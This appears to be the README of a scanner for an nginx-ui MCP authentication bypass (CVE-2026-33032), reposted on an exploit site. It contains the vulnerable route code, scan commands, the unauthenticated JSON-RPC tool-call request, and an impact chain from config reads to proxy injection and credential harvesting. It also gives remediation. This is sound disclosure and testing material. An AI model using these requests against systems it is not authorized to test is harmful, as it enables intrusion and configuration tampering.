Share
## https://sploitus.com/exploit?id=81CB5F6F-3C3E-5B81-A3F1-3878300CAE13
# CVE-2026-33032 Scanner
**Non-destructive vulnerability scanner for Nginx-UI MCP Endpoint Authentication Bypass**
## Vulnerability Overview
**CVE-2026-33032** is an authentication bypass vulnerability in nginx-ui's Model Context Protocol (MCP) integration. The `/mcp_message` endpoint lacks authentication middleware while providing access to all MCP tools, allowing remote attackers to:
- Read nginx configurations and status
- Create/modify/delete nginx configuration files
- Restart or reload nginx service
- Exfiltrate sensitive configuration data
- Inject malicious configurations for traffic interception
### Root Cause
1. **Auth Asymmetry**: The `/mcp` endpoint requires authentication, but `/mcp_message` does not:
```go
r.Any("/mcp", middleware.IPWhiteList(), middleware.AuthRequired(), ...)
r.Any("/mcp_message", middleware.IPWhiteList(), ...) // Missing AuthRequired()
```
2. **Fail-Open IP Whitelist**: The default IP whitelist is empty, which the middleware treats as "allow all"
3. **Both Endpoints Share Handler**: Both route to the same `mcp.ServeHTTP()` which processes all MCP tool invocations
## Scanner Features
โ
**Non-destructive testing** - Uses only read-only MCP tools
โ
**Comprehensive fingerprinting** - Identifies nginx-ui installations
โ
**Safe proof-of-concept** - No configuration changes made
โ
**Batch scanning** - Process multiple targets from file
โ
**Detailed reporting** - JSON output for integration
## Installation
```bash
# Clone or download the scanner
git clone https://github.com/cve-2026-33032-scanner.git
cd cve-2026-33032
chmod +x cve-2026-33032-scanner.py
# Install dependencies (if needed)
pip3 install requests
```
## Usage
### Basic Scan
```bash
# Scan a single target
python3 cve-2026-33032-scanner.py -u http://target.com:9000
# Scan with verbose output
python3 cve-2026-33032-scanner.py -u https://nginx-ui.example.com -v
# Custom timeout
python3 cve-2026-33032-scanner.py -u http://192.168.1.100:9000 -t 15
```
### Batch Scanning
```bash
# Scan multiple targets from file
python3 cve-2026-33032-scanner.py -f targets.txt
# With verbose output and JSON report
python3 cve-2026-33032-scanner.py -f targets.txt -v -o results.json
#Burp Pingback
python3 cve-2026-33032-scanner.py -u http://target.com:9000 --collaborator abc123.burpcollaborator.net
```
### Target File Format
```
# targets.txt - one URL per line
http://192.168.1.100:9000
https://nginx-ui.corp.com
http://10.0.0.50:9000
```
## How It Works
The scanner performs a multi-stage detection process:
### Stage 1: Fingerprinting
Checks common nginx-ui endpoints to identify the installation:
- `/api/info` - Version information
- `/login` - Login page
- `/api/auth/login` - Authentication endpoint
- `/mcp` and `/mcp_message` - MCP endpoints
### Stage 2: Authentication Check
Tests the `/mcp` endpoint to verify it properly requires authentication (baseline)
### Stage 3: Vulnerability Exploitation
Attempts **non-destructive** MCP tool calls via `/mcp_message` WITHOUT authentication:
1. **nginx_status** (safest) - Reads nginx process status
2. **nginx_config_list** - Lists configuration files
3. **nginx_config_base_path** - Gets config directory path
If any tool succeeds without authentication, the vulnerability is confirmed.
## Safe MCP Tools Used
The scanner only invokes **read-only** MCP tools:
| Tool | Description | Impact |
|------|-------------|--------|
| `nginx_status` | Read nginx service status | No changes |
| `nginx_config_list` | List configuration files | No changes |
| `nginx_config_base_path` | Get config directory path | No changes |
**Tools explicitly avoided:**
- `nginx_config_add` - Would create files
- `nginx_config_modify` - Would alter configs
- `restart_nginx` / `reload_nginx` - Service disruption
- `nginx_config_enable` - Would change active configs
## Output Examples
### Vulnerable Target
```
[+] nginx-ui detected: Found 'nginx-ui' in /login
[+] /mcp endpoint properly protected
[*] Testing /mcp_message endpoint (CVE-2026-33032)...
[*] Trying tool: nginx_status - Read nginx status (safest)
Status: 200
======================================================================
[!] VULNERABLE to CVE-2026-33032
======================================================================
Proof: Successfully executed nginx_status without authentication
```
### Protected Target
```
[+] nginx-ui detected: Version endpoint accessible
[+] /mcp endpoint properly protected
[*] Testing /mcp_message endpoint (CVE-2026-33032)...
[*] Trying tool: nginx_status - Read nginx status (safest)
Status: 401
Auth required (protected) โ
[+] NOT vulnerable - endpoint requires authentication
```
## Remediation
If the vulnerability is confirmed:
1. **Immediate Fix**: Add authentication middleware to `/mcp_message`:
```go
r.Any("/mcp_message", middleware.IPWhiteList(), middleware.AuthRequired(),
func(c *gin.Context) {
mcp.ServeHTTP(c)
})
```
2. **Defense in Depth**:
- Configure IP whitelist to deny-all by default
- Restrict MCP endpoints to localhost only if external access not needed
- Implement rate limiting on MCP endpoints
3. **Upgrade**: Update to patched nginx-ui version when available
## Responsible Disclosure
This tool is designed for:
- โ
Bug bounty programs
- โ
Authorized penetration testing
- โ
Security research with permission
- โ
Vulnerability validation before disclosure
**Do NOT use this tool on systems you don't own or have explicit permission to test.**
## Bug Bounty Tips
When reporting this vulnerability:
1. **Severity**: Critical (CVSS 9.8+)
- Network accessible
- No authentication required
- Complete system compromise
- Config exfiltration + modification
2. **Proof**: Include scanner output showing successful unauthenticated MCP tool invocation
3. **Impact Chain**:
- Unauthenticated access โ Config read โ Backend topology revealed
- Config write โ Malicious proxy injection โ Credential harvesting
- Nginx restart โ Service disruption โ DoS
4. **Safe PoC**: Use only the read-only tools (nginx_status, nginx_config_list)
## Technical Details
### MCP Tool Invocation Format
```json
POST /mcp_message HTTP/1.1
Content-Type: application/json
{
"jsonrpc": "2.0",
"method": "tools/call",
"params": {
"name": "nginx_status",
"arguments": {}
},
"id": 1
}
```
### Successful Response
```json
{
"jsonrpc": "2.0",
"result": {
"content": [
{
"type": "text",
"text": "nginx is running (PID: 1234)"
}
]
},
"id": 1
}
```
### Protected Response
```json
HTTP/1.1 401 Unauthorized
{
"error": "authentication required"
}
```
## References
- **CVE**: CVE-2026-33032
- **Affected**: nginx-ui (versions with MCP integration)
- **CVSS**: 9.8 (Critical)
- **CWE**: CWE-306 (Missing Authentication for Critical Function)
## License
This tool is provided for educational and authorized security testing purposes only.
## Author
**Antony Esthak Twinson @ Cyber Tamarin**
Security Researcher | Bug Bounty Hunter
Specializing in Web Application Security & Vulnerability Research
---
**Disclaimer**: This scanner performs non-destructive testing only. Always obtain proper authorization before testing any systems.